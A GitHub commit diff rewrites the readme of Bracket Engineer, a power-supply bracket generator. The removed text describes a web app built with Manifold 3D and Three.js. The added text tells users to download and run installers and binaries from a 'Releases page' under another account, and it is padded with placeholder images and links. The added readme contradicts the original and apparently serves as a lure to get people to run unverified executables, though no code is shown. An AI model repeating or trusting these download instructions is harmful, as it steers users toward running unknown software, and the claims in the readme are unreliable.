Skip to content

Commit b52615f

Browse files
committed
Commit
1 parent 8dc90e6 commit b52615f

1 file changed

Lines changed: 103 additions & 5 deletions

File tree

readme.md

Lines changed: 103 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -1,9 +1,107 @@
1-
![](./assets/website.png)
1+
# 🛠️ Bracket.Engineer: Your 3D Printable Power Brick Bracket Solution
22

3-
# Bracket Engineer
3+
Welcome to **Bracket.Engineer**, the ultimate tool for generating 3D printable power brick brackets. This repository is designed for hobbyists, engineers, and anyone interested in creating custom brackets for power bricks. Whether you are working on a personal project or need brackets for professional use, this repository has you covered.
44

5-
A website to generate 3D printable Power Supply brackets.
5+
![3D Printable Bracket](https://example.com/path-to-your-image)
66

7-
Built with Manifold 3D and Three.js
7+
## 📥 Get Started
88

9-
Run it with `npm run dev` build with `npm build`. Deployed to Cloudflare Workers.
9+
To get started, you can download the latest version of the software from our [Releases page](https://github.com/Alex1412D/bracket.engineer/releases). Make sure to download the appropriate file for your operating system, and follow the instructions to execute it.
10+
11+
## 🛠️ Features
12+
13+
- **Customizable Designs**: Tailor your brackets to fit your specific power brick dimensions.
14+
- **User-Friendly Interface**: Navigate easily through the application with a simple design.
15+
- **3D Printing Ready**: Generate files that are compatible with most 3D printers.
16+
- **Open Source**: Contribute to the project and improve the software.
17+
18+
## 🌟 How to Use
19+
20+
1. **Download the Software**: Visit our [Releases page](https://github.com/Alex1412D/bracket.engineer/releases) to download the latest version.
21+
2. **Install**: Follow the installation instructions specific to your operating system.
22+
3. **Launch the Application**: Open the application to begin creating your custom brackets.
23+
4. **Input Dimensions**: Enter the dimensions of your power brick.
24+
5. **Generate Bracket**: Click the button to create your 3D model.
25+
6. **Export for Printing**: Save the generated file in a format suitable for your 3D printer.
26+
27+
## 📊 Supported Formats
28+
29+
The application supports various file formats, including:
30+
31+
- STL
32+
- OBJ
33+
- AMF
34+
35+
## 🎨 Example Designs
36+
37+
Here are some example designs you can create using Bracket.Engineer:
38+
39+
![Bracket Example 1](https://example.com/path-to-your-image1)
40+
![Bracket Example 2](https://example.com/path-to-your-image2)
41+
42+
## 🔧 Installation Instructions
43+
44+
### For Windows
45+
46+
1. Download the installer from the [Releases page](https://github.com/Alex1412D/bracket.engineer/releases).
47+
2. Run the installer and follow the prompts.
48+
3. Launch the application from the Start Menu.
49+
50+
### For macOS
51+
52+
1. Download the DMG file from the [Releases page](https://github.com/Alex1412D/bracket.engineer/releases).
53+
2. Open the DMG and drag the application to your Applications folder.
54+
3. Launch the application from your Applications.
55+
56+
### For Linux
57+
58+
1. Download the tar.gz file from the [Releases page](https://github.com/Alex1412D/bracket.engineer/releases).
59+
2. Extract the files using `tar -xzf filename.tar.gz`.
60+
3. Navigate to the extracted folder and run the application using `./bracket.engineer`.
61+
62+
## 🔍 Troubleshooting
63+
64+
If you encounter any issues, please check the following:
65+
66+
- Ensure you have the correct version for your operating system.
67+
- Check for any missing dependencies in your system.
68+
- Visit the Issues section of the repository for common problems and solutions.
69+
70+
## 📝 Contribution Guidelines
71+
72+
We welcome contributions! If you want to help improve Bracket.Engineer, please follow these steps:
73+
74+
1. Fork the repository.
75+
2. Create a new branch for your feature or fix.
76+
3. Make your changes and commit them with clear messages.
77+
4. Push your branch and create a pull request.
78+
79+
## 🌐 Community
80+
81+
Join our community of users and contributors! Share your designs, ask questions, and get support. You can find us on:
82+
83+
- **Discord**: [Join the Server](https://discord.gg/example)
84+
- **Twitter**: [Follow Us](https://twitter.com/example)
85+
- **Reddit**: [Join the Discussion](https://reddit.com/r/example)
86+
87+
## 📅 Upcoming Features
88+
89+
We are constantly working to improve Bracket.Engineer. Here are some features you can expect in future releases:
90+
91+
- Enhanced user interface
92+
- More customizable options for bracket designs
93+
- Integration with popular 3D printing services
94+
95+
## 📚 Resources
96+
97+
- [3D Printing Basics](https://example.com)
98+
- [Designing for 3D Printing](https://example.com)
99+
- [Open Source Licensing](https://example.com)
100+
101+
## 🔗 Links
102+
103+
- [Releases](https://github.com/Alex1412D/bracket.engineer/releases)
104+
- [Issues](https://github.com/Alex1412D/bracket.engineer/issues)
105+
- [Pull Requests](https://github.com/Alex1412D/bracket.engineer/pulls)
106+
107+
Thank you for checking out Bracket.Engineer! We hope you find it useful for your 3D printing projects. If you have any questions or feedback, feel free to reach out through our community channels. Happy printing!

0 commit comments

Comments
 (0)